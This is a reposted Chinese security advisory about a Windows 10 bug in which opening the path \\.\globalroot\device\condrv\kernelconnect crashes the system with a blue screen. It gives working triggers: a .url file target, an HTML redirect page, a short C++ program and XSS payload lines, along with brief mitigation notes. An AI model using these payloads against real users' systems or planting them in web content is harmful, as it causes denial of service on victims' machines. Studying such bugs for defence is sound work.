转载自开普勒安全团队
样本
核心代码为:file:///globalroot/device/condrv/kernelconnect
受灾画面:
分析:
.url文件
url格式的文件是一种网页文件,只要接触就会触发访问
漏洞分析见之前发的文章:
防护方法:
仅对windows10系统有效,其它系统不受影响
windows微信用户可关闭自动下载
更多方式(.html .exe):
<html>
<head>
</head>
<body>>
<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script>
</body>
</html>
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
int main()
{
WCHAR fileName[] = L"\\.\globalroot\device\condrv\kernelconnect";
WIN32_FILE_ATTRIBUTE_DATA data;
GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);
}
吾爱破解大牛分析:
https://www.52pojie.cn/thread-1354077-1-1.html
其他利用方式XSS漏洞:
<script>document.location = '\\.\globalroot\device\condrv\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>
请做好个人防护!谨防漏洞威胁!
识别二维码,关注我们
本文始发于微信公众号(WhITECat安全团队):红色警戒!Windows微信蓝屏文件刨析!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论